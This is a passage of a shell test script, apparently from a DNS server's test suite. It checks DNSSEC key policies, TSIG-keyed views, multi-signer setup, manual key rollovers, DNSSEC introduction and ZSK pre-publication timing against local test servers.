+# ns4/override.none.signed
+# ns5/override.override.unsigned
+# ns5/override.none.unsigned
+# ns4/example.net (both views)
+set_keyrole "KEY1" "csk"
+set_keylifetime "KEY1" "0"
+set_keyalgorithm "KEY1" "14" "ECDSAP384SHA384" "384"
+set_keysigning "KEY1" "yes"
+set_zonesigning "KEY1" "yes"
+
+set_zone "inherit.inherit.signed"
+set_policy "test" "1" "3600"
+set_server "ns4" "10.53.0.4"
+TSIG="hmac-sha1:sha1:$SHA1"
+wait_for_nsec
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_csk_policy
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+set_zone "override.override.signed"
+set_policy "test" "1" "3600"
+set_server "ns4" "10.53.0.4"
+TSIG="hmac-sha224:sha224:$SHA224"
+wait_for_nsec
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_csk_policy
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+set_zone "override.none.signed"
+set_policy "test" "1" "3600"
+set_server "ns4" "10.53.0.4"
+TSIG="hmac-sha256:sha256:$SHA256"
+wait_for_nsec
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_csk_policy
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+set_zone "override.override.unsigned"
+set_policy "test" "1" "3600"
+set_server "ns5" "10.53.0.5"
+TSIG="hmac-sha224:sha224:$SHA224"
+wait_for_nsec
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_csk_policy
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+set_zone "override.none.unsigned"
+set_policy "test" "1" "3600"
+set_server "ns5" "10.53.0.5"
+TSIG="hmac-sha256:sha256:$SHA256"
+wait_for_nsec
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_csk_policy
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Test with views.
+set_zone "example.net"
+set_server "ns4" "10.53.0.4"
+TSIG="$DEFAULT_HMAC:keyforview1:$VIEW1"
+wait_for_nsec
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" "example1"
+set_keytimes_csk_policy
+check_keytimes
+check_apex
+dnssec_verify
+# check zonestatus
+n=$((n+1))
+echo_i "check $ZONE (view example1) zonestatus ($n)"
+ret=0
+check_isdynamic "$SERVER" "$ZONE" "example1" || log_error "zone not dynamic"
+check_inlinesigning "$SERVER" "$ZONE" "example1" && log_error "inline-signing enabled, expected disabled"
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+# check subdomain
+n=$((n+1))
+echo_i "check TXT example.net (view example1) rrset is signed correctly ($n)"
+ret=0
+dig_with_opts "view.${ZONE}" "@${SERVER}" TXT > "dig.out.$DIR.test$n.txt" || log_error "dig view.${ZONE} TXT failed"
+grep "status: NOERROR" "dig.out.$DIR.test$n.txt" > /dev/null || log_error "mismatch status in DNS response"
+grep "view.${ZONE}\..*${DEFAULT_TTL}.*IN.*TXT.*view1" "dig.out.$DIR.test$n.txt" > /dev/null || log_error "missing view.${ZONE} TXT record in response"
+check_signatures TXT "dig.out.$DIR.test$n.txt" "ZSK"
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+TSIG="$DEFAULT_HMAC:keyforview2:$VIEW2"
+wait_for_nsec
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" "example2"
+check_apex
+dnssec_verify
+# check zonestatus
+n=$((n+1))
+echo_i "check $ZONE (view example2) zonestatus ($n)"
+ret=0
+check_isdynamic "$SERVER" "$ZONE" "example2" && log_error "zone dynamic, but not expected"
+check_inlinesigning "$SERVER" "$ZONE" "example2" || log_error "inline-signing disabled, expected enabled"
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+# check subdomain
+n=$((n+1))
+echo_i "check TXT example.net (view example2) rrset is signed correctly ($n)"
+ret=0
+dig_with_opts "view.${ZONE}" "@${SERVER}" TXT > "dig.out.$DIR.test$n.txt" || log_error "dig view.${ZONE} TXT failed"
+grep "status: NOERROR" "dig.out.$DIR.test$n.txt" > /dev/null || log_error "mismatch status in DNS response"
+grep "view.${ZONE}\..*${DEFAULT_TTL}.*IN.*TXT.*view2" "dig.out.$DIR.test$n.txt" > /dev/null || log_error "missing view.${ZONE} TXT record in response"
+check_signatures TXT "dig.out.$DIR.test$n.txt" "ZSK"
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+TSIG="$DEFAULT_HMAC:keyforview3:$VIEW3"
+wait_for_nsec
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" "example3"
+check_apex
+dnssec_verify
+# check zonestatus
+n=$((n+1))
+echo_i "check $ZONE (view example3) zonestatus ($n)"
+ret=0
+check_isdynamic "$SERVER" "$ZONE" "example3" && log_error "zone dynamic, but not expected"
+check_inlinesigning "$SERVER" "$ZONE" "example3" || log_error "inline-signing disabled, expected enabled"
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+# check subdomain
+n=$((n+1))
+echo_i "check TXT example.net (view example3) rrset is signed correctly ($n)"
+ret=0
+dig_with_opts "view.${ZONE}" "@${SERVER}" TXT > "dig.out.$DIR.test$n.txt" || log_error "dig view.${ZONE} TXT failed"
+grep "status: NOERROR" "dig.out.$DIR.test$n.txt" > /dev/null || log_error "mismatch status in DNS response"
+grep "view.${ZONE}\..*${DEFAULT_TTL}.*IN.*TXT.*view2" "dig.out.$DIR.test$n.txt" > /dev/null || log_error "missing view.${ZONE} TXT record in response"
+check_signatures TXT "dig.out.$DIR.test$n.txt" "ZSK"
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# Clear TSIG.
+TSIG=""
+
+#
+# Testing RFC 8901 Multi-Signer Model 2.
+#
+set_zone "multisigner-model2.kasp"
+set_policy "multisigner-model2" "2" "3600"
+set_server "ns3" "10.53.0.3"
+key_clear "KEY1"
+key_clear "KEY2"
+key_clear "KEY3"
+key_clear "KEY4"
+
+# Key properties.
+set_keyrole "KEY1" "ksk"
+set_keylifetime "KEY1" "0"
+set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+set_keysigning "KEY1" "yes"
+set_zonesigning "KEY1" "no"
+
+set_keyrole "KEY2" "zsk"
+set_keylifetime "KEY2" "0"
+set_keyalgorithm "KEY2" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+set_keysigning "KEY2" "no"
+set_zonesigning "KEY2" "yes"
+
+set_keystate "KEY1" "GOAL" "omnipresent"
+set_keystate "KEY1" "STATE_DNSKEY" "rumoured"
+set_keystate "KEY1" "STATE_KRRSIG" "rumoured"
+set_keystate "KEY1" "STATE_DS" "hidden"
+set_keystate "KEY2" "GOAL" "omnipresent"
+set_keystate "KEY2" "STATE_DNSKEY" "rumoured"
+set_keystate "KEY2" "STATE_ZRRSIG" "rumoured"
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+dnssec_verify
+
+# Check that the ZSKs from the other provider are published.
+zsks_are_published() {
+ dig_with_opts +short "$ZONE" "@${SERVER}" DNSKEY > "dig.out.$DIR.test$n" || return 1
+ # We should have three ZSKs.
+ lines=$(grep "256 3 13" dig.out.$DIR.test$n | wc -l)
+ test "$lines" -eq 3 || return 1
+ # And one KSK.
+ lines=$(grep "257 3 13" dig.out.$DIR.test$n | wc -l)
+ test "$lines" -eq 1 || return 1
+}
+
+n=$((n+1))
+echo_i "update zone with ZSK from another provider for zone ${ZONE} ($n)"
+ret=0
+(
+echo zone ${ZONE}
+echo server 10.53.0.3 "$PORT"
+echo update add $(cat "${DIR}/${ZONE}.zsk2")
+echo send
+) | $NSUPDATE
+retry_quiet 10 zsks_are_published || ret=1
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+#
+# Testing manual rollover.
+#
+set_zone "manual-rollover.kasp"
+set_policy "manual-rollover" "2" "3600"
+set_server "ns3" "10.53.0.3"
+key_clear "KEY1"
+key_clear "KEY2"
+key_clear "KEY3"
+key_clear "KEY4"
+# Key properties.
+set_keyrole "KEY1" "ksk"
+set_keylifetime "KEY1" "0"
+set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+set_keysigning "KEY1" "yes"
+set_zonesigning "KEY1" "no"
+
+set_keyrole "KEY2" "zsk"
+set_keylifetime "KEY2" "0"
+set_keyalgorithm "KEY2" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+set_keysigning "KEY2" "no"
+set_zonesigning "KEY2" "yes"
+# During set up everything was set to OMNIPRESENT.
+set_keystate "KEY1" "GOAL" "omnipresent"
+set_keystate "KEY1" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY1" "STATE_KRRSIG" "omnipresent"
+set_keystate "KEY1" "STATE_DS" "omnipresent"
+
+set_keystate "KEY2" "GOAL" "omnipresent"
+set_keystate "KEY2" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent"
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# The first keys were published and activated a day ago.
+created=$(key_get KEY1 CREATED)
+set_addkeytime "KEY1" "PUBLISHED" "${created}" -86400
+set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" -86400
+set_addkeytime "KEY1" "ACTIVE" "${created}" -86400
+created=$(key_get KEY2 CREATED)
+set_addkeytime "KEY2" "PUBLISHED" "${created}" -86400
+set_addkeytime "KEY2" "ACTIVE" "${created}" -86400
+# Key lifetimes are unlimited, so not setting RETIRED and REMOVED.
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Schedule KSK rollover in six months (15552000 seconds).
+active=$(key_get KEY1 ACTIVE)
+set_addkeytime "KEY1" "RETIRED" "${active}" 15552000
+retired=$(key_get KEY1 RETIRED)
+rndc_rollover "$SERVER" "$DIR" $(key_get KEY1 ID) "${retired}" "$ZONE"
+# Rollover starts in six months, but lifetime is set to six months plus
+# prepublication duration = 15552000 + 7500 = 15559500 seconds.
+set_keylifetime "KEY1" "15559500"
+set_addkeytime "KEY1" "RETIRED" "${active}" 15559500
+retired=$(key_get KEY1 RETIRED)
+# Retire interval of this policy is 26h (93600 seconds).
+set_addkeytime "KEY1" "REMOVED" "${retired}" 93600
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Schedule KSK rollover now.
+set_policy "manual-rollover" "3" "3600"
+set_keystate "KEY1" "GOAL" "hidden"
+# This key was activated one day ago, so lifetime is set to 1d plus
+# prepublication duration (7500 seconds) = 93900 seconds.
+set_keylifetime "KEY1" "93900"
+created=$(key_get KEY1 CREATED)
+set_keytime "KEY1" "RETIRED" "${created}"
+rndc_rollover "$SERVER" "$DIR" $(key_get KEY1 ID) "${created}" "$ZONE"
+# New key is introduced.
+set_keyrole "KEY3" "ksk"
+set_keylifetime "KEY3" "0"
+set_keyalgorithm "KEY3" "13" "ECDSAP256SHA256" "256"
+set_keysigning "KEY3" "yes"
+set_zonesigning "KEY3" "no"
+
+set_keystate "KEY3" "GOAL" "omnipresent"
+set_keystate "KEY3" "STATE_DNSKEY" "rumoured"
+set_keystate "KEY3" "STATE_KRRSIG" "rumoured"
+set_keystate "KEY3" "STATE_DS" "hidden"
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+dnssec_verify
+
+# Schedule ZSK rollover now.
+set_policy "manual-rollover" "4" "3600"
+set_keystate "KEY2" "GOAL" "hidden"
+# This key was activated one day ago, so lifetime is set to 1d plus
+# prepublication duration (7500 seconds) = 93900 seconds.
+set_keylifetime "KEY2" "93900"
+created=$(key_get KEY2 CREATED)
+set_keytime "KEY2" "RETIRED" "${created}"
+rndc_rollover "$SERVER" "$DIR" $(key_get KEY2 ID) "${created}" "$ZONE"
+# New key is introduced.
+set_keyrole "KEY4" "zsk"
+set_keylifetime "KEY4" "0"
+set_keyalgorithm "KEY4" "13" "ECDSAP256SHA256" "256"
+set_keysigning "KEY4" "no"
+set_zonesigning "KEY4" "no" # not yet, first prepublish DNSKEY.
+
+set_keystate "KEY4" "GOAL" "omnipresent"
+set_keystate "KEY4" "STATE_DNSKEY" "rumoured"
+set_keystate "KEY4" "STATE_ZRRSIG" "hidden"
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+dnssec_verify
+
+# Try to schedule a ZSK rollover for an inactive key (should fail).
+n=$((n+1))
+echo_i "check that rndc dnssec -rollover fails if key is inactive ($n)"
+ret=0
+rndccmd "$SERVER" dnssec -rollover -key $(key_get KEY4 ID) "$ZONE" > rndc.dnssec.rollover.out.$ZONE.$n
+grep "key is not actively signing" rndc.dnssec.rollover.out.$ZONE.$n > /dev/null || log_error "bad error message"
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+#
+# Testing DNSSEC introduction.
+#
+
+#
+# Zone: step1.enable-dnssec.autosign.
+#
+set_zone "step1.enable-dnssec.autosign"
+set_policy "enable-dnssec" "1" "300"
+set_server "ns3" "10.53.0.3"
+# Key properties.
+key_clear "KEY1"
+set_keyrole "KEY1" "csk"
+set_keylifetime "KEY1" "0"
+set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+set_keysigning "KEY1" "yes"
+set_zonesigning "KEY1" "yes"
+# The DNSKEY and signatures are introduced first, the DS remains hidden.
+set_keystate "KEY1" "GOAL" "omnipresent"
+set_keystate "KEY1" "STATE_DNSKEY" "rumoured"
+set_keystate "KEY1" "STATE_KRRSIG" "rumoured"
+set_keystate "KEY1" "STATE_ZRRSIG" "rumoured"
+set_keystate "KEY1" "STATE_DS" "hidden"
+# This policy lists only one key (CSK).
+key_clear "KEY2"
+key_clear "KEY3"
+key_clear "KEY4"
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# Set expected key times:
+# - The first key is immediately published and activated.
+created=$(key_get KEY1 CREATED)
+set_keytime "KEY1" "PUBLISHED" "${created}"
+set_keytime "KEY1" "ACTIVE" "${created}"
+# - The DS can be published if the DNSKEY and RRSIG records are
+# OMNIPRESENT. This happens after max-zone-ttl (12h) plus
+# publish-safety (5m) plus zone-propagation-delay (5m) =
+# 43200 + 300 + 300 = 43800.
+set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" 43800
+# - Key lifetime is unlimited, so not setting RETIRED and REMOVED.
+
+# Various signing policy checks.
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+_check_next_key_event() {
+ _expect=$1
+
+ grep "zone ${ZONE}.*: next key event in .* seconds" "${DIR}/named.run" > "keyevent.out.$ZONE.test$n" || return 1
+
+ # Get the latest next key event.
+ if [ "${DYNAMIC}" = "yes" ]; then
+ _time=$(awk '{print $9}' < "keyevent.out.$ZONE.test$n" | tail -1)
+ else
+ # inline-signing zone adds "(signed)"
+ _time=$(awk '{print $10}' < "keyevent.out.$ZONE.test$n" | tail -1)
+ fi
+
+ # The next key event time must within threshold of the
+ # expected time.
+ _expectmin=$((_expect-next_key_event_threshold))
+ _expectmax=$((_expect+next_key_event_threshold))
+
+ test $_expectmin -le "$_time" || return 1
+ test $_expectmax -ge "$_time" || return 1
+
+ return 0
+}
+
+check_next_key_event() {
+ n=$((n+1))
+ echo_i "check next key event for zone ${ZONE} ($n)"
+ ret=0
+
+ retry_quiet 3 _check_next_key_event $1 || log_error "bad next key event time for zone ${ZONE} (expect ${_expect})"
+ test "$ret" -eq 0 || echo_i "failed"
+ status=$((status+ret))
+
+}
+
+# Next key event is when the DNSKEY RRset becomes OMNIPRESENT: DNSKEY TTL plus
+# publish safety plus the zone propagation delay: 900 seconds.
+check_next_key_event 900
+
+#
+# Zone: step2.enable-dnssec.autosign.
+#
+set_zone "step2.enable-dnssec.autosign"
+set_policy "enable-dnssec" "1" "300"
+set_server "ns3" "10.53.0.3"
+# The DNSKEY is omnipresent, but the zone signatures not yet.
+# Thus, the DS remains hidden.
+set_keystate "KEY1" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY1" "STATE_KRRSIG" "omnipresent"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# Set expected key times:
+# - The key was published and activated 900 seconds ago (with settime).
+created=$(key_get KEY1 CREATED)
+set_addkeytime "KEY1" "PUBLISHED" "${created}" -900
+set_addkeytime "KEY1" "ACTIVE" "${created}" -900
+set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" 43800
+
+# Continue signing policy checks.
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is when the zone signatures become OMNIPRESENT: max-zone-ttl
+# plus zone propagation delay plus retire safety minus the already elapsed
+# 900 seconds: 12h + 300s + 20m - 900 = 44700 - 900 = 43800 seconds
+check_next_key_event 43800
+
+#
+# Zone: step3.enable-dnssec.autosign.
+#
+set_zone "step3.enable-dnssec.autosign"
+set_policy "enable-dnssec" "1" "300"
+set_server "ns3" "10.53.0.3"
+# All signatures should be omnipresent, so the DS can be submitted.
+set_keystate "KEY1" "STATE_ZRRSIG" "omnipresent"
+set_keystate "KEY1" "STATE_DS" "rumoured"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# Set expected key times:
+# - The key was published and activated 44700 seconds ago (with settime).
+created=$(key_get KEY1 CREATED)
+set_addkeytime "KEY1" "PUBLISHED" "${created}" -44700
+set_addkeytime "KEY1" "ACTIVE" "${created}" -44700
+set_keytime "KEY1" "SYNCPUBLISH" "${created}"
+
+# Continue signing policy checks.
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+# Check that CDS publication is logged.
+check_cdslog "$DIR" "$ZONE" KEY1
+
+# The DS can be introduced. We ignore any parent registration delay, so set
+# the DS publish time to now.
+rndc_checkds "$SERVER" "$DIR" KEY1 "now" "published" "$ZONE"
+# Next key event is when the DS can move to the OMNIPRESENT state. This occurs
+# when the parent propagation delay have passed, plus the DS TTL and retire
+# safety delay: 1h + 2h + 20m = 3h20m = 12000 seconds
+check_next_key_event 12000
+
+#
+# Zone: step4.enable-dnssec.autosign.
+#
+set_zone "step4.enable-dnssec.autosign"
+set_policy "enable-dnssec" "1" "300"
+set_server "ns3" "10.53.0.3"
+# The DS is omnipresent.
+set_keystate "KEY1" "STATE_DS" "omnipresent"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# Set expected key times:
+# - The key was published and activated 56700 seconds ago (with settime).
+created=$(key_get KEY1 CREATED)
+set_addkeytime "KEY1" "PUBLISHED" "${created}" -56700
+set_addkeytime "KEY1" "ACTIVE" "${created}" -56700
+set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" -12000
+
+# Continue signing policy checks.
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is never, the zone dnssec-policy has been established. So we
+# fall back to the default loadkeys interval.
+check_next_key_event 3600
+
+#
+# Testing ZSK Pre-Publication rollover.
+#
+
+# Policy parameters.
+# Lksk: 2 years (63072000 seconds)
+# Lzsk: 30 days (2592000 seconds)
+# Iret(KSK): DS TTL (1d) + DprpP (1h) + retire-safety (2d)
+# Iret(KSK): 3d1h (262800 seconds)
+# Iret(ZSK): RRSIG TTL (1d) + Dprp (1h) + Dsgn (1w) + retire-safety (2d)
+# Iret(ZSK): 10d1h (867600 seconds)
+Lksk=63072000
+Lzsk=2592000
+IretKSK=262800
+IretZSK=867600
+
+#
+# Zone: step1.zsk-prepub.autosign.
+#
+set_zone "step1.zsk-prepub.autosign"
+set_policy "zsk-prepub" "2" "3600"
+set_server "ns3" "10.53.0.3"
+
+set_retired_removed() {
+ _Lkey=$2
+ _Iret=$3
+
+ _active=$(key_get $1 ACTIVE)
+ set_addkeytime "${1}" "RETIRED" "${_active}" "${_Lkey}"
+ _retired=$(key_get $1 RETIRED)
+ set_addkeytime "${1}" "REMOVED" "${_retired}" "${_Iret}"
+}
+
+rollover_predecessor_keytimes() {
+ _addtime=$1
+
+ _created=$(key_get KEY1 CREATED)
+ set_addkeytime "KEY1" "PUBLISHED" "${_created}" "${_addtime}"
+ set_addkeytime "KEY1" "SYNCPUBLISH" "${_created}" "${_addtime}"
+ set_addkeytime "KEY1" "ACTIVE" "${_created}" "${_addtime}"
+ [ "$Lksk" = 0 ] || set_retired_removed "KEY1" "${Lksk}" "${IretKSK}"
+
+ _created=$(key_get KEY2 CREATED)
+ set_addkeytime "KEY2" "PUBLISHED" "${_created}" "${_addtime}"
+ set_addkeytime "KEY2" "ACTIVE" "${_created}" "${_addtime}"
+ [ "$Lzsk" = 0 ] || set_retired_removed "KEY2" "${Lzsk}" "${IretZSK}"
+}
+
+# Key properties.
+key_clear "KEY1"
+set_keyrole "KEY1" "ksk"
+set_keylifetime "KEY1" "${Lksk}"
+set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+set_keysigning "KEY1" "yes"
+set_zonesigning "KEY1" "no"
+
+key_clear "KEY2"
+set_keyrole "KEY2" "zsk"
+set_keylifetime "KEY2" "${Lzsk}"
+set_keyalgorithm "KEY2" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+set_keysigning "KEY2" "no"
+set_zonesigning "KEY2" "yes"
+# Both KSK (KEY1) and ZSK (KEY2) start in OMNIPRESENT.
+set_keystate "KEY1" "GOAL" "omnipresent"
+set_keystate "KEY1" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY1" "STATE_KRRSIG" "omnipresent"
+set_keystate "KEY1" "STATE_DS" "omnipresent"
+
+set_keystate "KEY2" "GOAL" "omnipresent"
+set_keystate "KEY2" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent"
+# Initially only two keys.
+key_clear "KEY3"
+key_clear "KEY4"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+# These keys are immediately published and activated.
+rollover_predecessor_keytimes 0
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is when the successor ZSK needs to be published. That is
+# the ZSK lifetime - prepublication time. The prepublication time is DNSKEY
+# TTL plus publish safety plus the zone propagation delay. For the
+# zsk-prepub policy that means: 30d - 3600s + 1d + 1h = 2498400 seconds.
+check_next_key_event 2498400
+
+#
+# Zone: step2.zsk-prepub.autosign.
+#
+set_zone "step2.zsk-prepub.autosign"
+set_policy "zsk-prepub" "3" "3600"
+set_server "ns3" "10.53.0.3"
+# New ZSK (KEY3) is prepublished, but not yet signing.
+key_clear "KEY3"
+set_keyrole "KEY3" "zsk"
+set_keylifetime "KEY3" "${Lzsk}"
+set_keyalgorithm "KEY3" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+set_keysigning "KEY3" "no"
+set_zonesigning "KEY3" "no"
+# Key states.
+set_keystate "KEY2" "GOAL" "hidden"
+set_keystate "KEY3" "GOAL" "omnipresent"
+set_keystate "KEY3" "STATE_DNSKEY" "rumoured"
+set_keystate "KEY3" "STATE_ZRRSIG" "hidden"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# Set expected key times:
+# - The old keys were activated 694 hours ago (2498400 seconds).
+rollover_predecessor_keytimes -2498400
+# - The new ZSK is published now.
+created=$(key_get KEY3 CREATED)
+set_keytime "KEY3" "PUBLISHED" "${created}"
+# - The new ZSK becomes active when the DNSKEY is OMNIPRESENT.
+# Ipub: TTLkey (1h) + Dprp (1h) + publish-safety (1d)
+# Ipub: 26 hour (93600 seconds).
+IpubZSK=93600
+set_addkeytime "KEY3" "ACTIVE" "${created}" "${IpubZSK}"
+set_retired_removed "KEY3" "${Lzsk}" "${IretZSK}"
+
+# Continue signing policy checks.
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is when the successor ZSK becomes OMNIPRESENT. That is the
+# DNSKEY TTL plus the zone propagation delay, plus the publish-safety. For
+# the zsk-prepub policy, this means: 3600s + 1h + 1d = 93600 seconds.
+check_next_key_event 93600
+
+#
+# Zone: step3.zsk-prepub.autosign.
+#
+set_zone "step3.zsk-prepub.autosign"
+set_policy "zsk-prepub" "3" "3600"
+set_server "ns3" "10.53.0.3"
+# ZSK (KEY2) no longer is actively signing, RRSIG state in UNRETENTIVE.
+# New ZSK (KEY3) is now actively signing, RRSIG state in RUMOURED.
+set_zonesigning "KEY2" "no"
+set_keystate "KEY2" "STATE_ZRRSIG" "unretentive"
+set_zonesigning "KEY3" "yes"
+set_keystate "KEY3" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY3" "STATE_ZRRSIG" "rumoured"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# Set expected key times:
+# - The old keys are activated 30 days ago (2592000 seconds).
+rollover_predecessor_keytimes -2592000
+# - The new ZSK is published 26 hours ago (93600 seconds).
+created=$(key_get KEY3 CREATED)
+set_addkeytime "KEY3" "PUBLISHED" "${created}" -93600
+set_keytime "KEY3" "ACTIVE" "${created}"
+set_retired_removed "KEY3" "${Lzsk}" "${IretZSK}"
+
+# Continue signing policy checks.
+check_keytimes
+check_apex
+# Subdomain still has good signatures of ZSK (KEY2).
+# Set expected zone signing on for KEY2 and off for KEY3,
+# testing whether signatures which are still valid are being reused.
+set_zonesigning "KEY2" "yes"
+set_zonesigning "KEY3" "no"
+check_subdomain
+# Restore the expected zone signing properties.
+set_zonesigning "KEY2" "no"
+set_zonesigning "KEY3" "yes"
+dnssec_verify
+
+# Next key event is when all the RRSIG records have been replaced with
+# signatures of the new ZSK, in other words when ZRRSIG becomes OMNIPRESENT.
+# That is Dsgn plus the maximum zone TTL plus the zone propagation delay plus
+# retire-safety. For the zsk-prepub policy that means: 1w (because 2w validity
+# and refresh within a week) + 1d + 1h + 2d = 10d1h = 867600 seconds.
+check_next_key_event 867600
+
+#
+# Zone: step4.zsk-prepub.autosign.
+#
+set_zone "step4.zsk-prepub.autosign"
+set_policy "zsk-prepub" "3" "3600"
+set_server "ns3" "10.53.0.3"
+# ZSK (KEY2) DNSKEY is no longer needed.
+# ZSK (KEY3) is now actively signing, RRSIG state in RUMOURED.
+set_keystate "KEY2" "STATE_DNSKEY" "unretentive"
+set_keystate "KEY2" "STATE_ZRRSIG" "hidden"
+set_keystate "KEY3" "STATE_ZRRSIG" "omnipresent"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# Set expected key times:
+# - The old keys are activated 961 hours ago (3459600 seconds).
+rollover_predecessor_keytimes -3459600
+# - The new ZSK is published 267 hours ago (961200 seconds).
+created=$(key_get KEY3 CREATED)
+set_addkeytime "KEY3" "PUBLISHED" "${created}" -961200
+published=$(key_get KEY3 PUBLISHED)
+set_addkeytime "KEY3" "ACTIVE" "${published}" "${IpubZSK}"
+set_retired_removed "KEY3" "${Lzsk}" "${IretZSK}"
+
+# Continue signing policy checks.
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is when the DNSKEY enters the HIDDEN state. This is the
+# DNSKEY TTL plus zone propagation delay. For the zsk-prepub policy this is:
+# 3600s + 1h = 7200s
+check_next_key_event 7200
+
+#
+# Zone: step5.zsk-prepub.autosign.
+#
+set_zone "step5.zsk-prepub.autosign"
+set_policy "zsk-prepub" "3" "3600"
+set_server "ns3" "10.53.0.3"
+# ZSK (KEY2) DNSKEY is now completely HIDDEN and removed.
+set_keystate "KEY2" "STATE_DNSKEY" "hidden"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# Set expected key times:
+# - The old keys are activated 962 hours ago (3463200 seconds).
+rollover_predecessor_keytimes -3463200
+# - The new ZSK is published 268 hours ago (964800 seconds).
+created=$(key_get KEY3 CREATED)
+set_addkeytime "KEY3" "PUBLISHED" "${created}" -964800
+published=$(key_get KEY3 PUBLISHED)
+set_addkeytime "KEY3" "ACTIVE" "${published}" "${IpubZSK}"
+set_retired_removed "KEY3" "${Lzsk}" "${IretZSK}"
+
+# Continue signing policy checks.
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is when the new successor needs to be published. This is the
+# ZSK lifetime minus Iret minus Ipub minus DNSKEY TTL. For the zsk-prepub
+# policy this is: 30d - 867600s - 93600s - 3600s = 1627200 seconds.
+check_next_key_event 1627200
+
+#
+# Zone: step6.zsk-prepub.autosign.
+#
+set_zone "step6.zsk-prepub.autosign"
+set_policy "zsk-prepub" "2" "3600"
+set_server "ns3" "10.53.0.3"
+# ZSK (KEY2) DNSKEY is purged.
+key_clear "KEY2"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+dnssec_verify
+
+#
+# Testing KSK Double-KSK rollover.
+#
+
+# Policy parameters.
+# Lksk: 60 days (16070400 seconds)
+# Lzsk: 1 year (31536000 seconds)
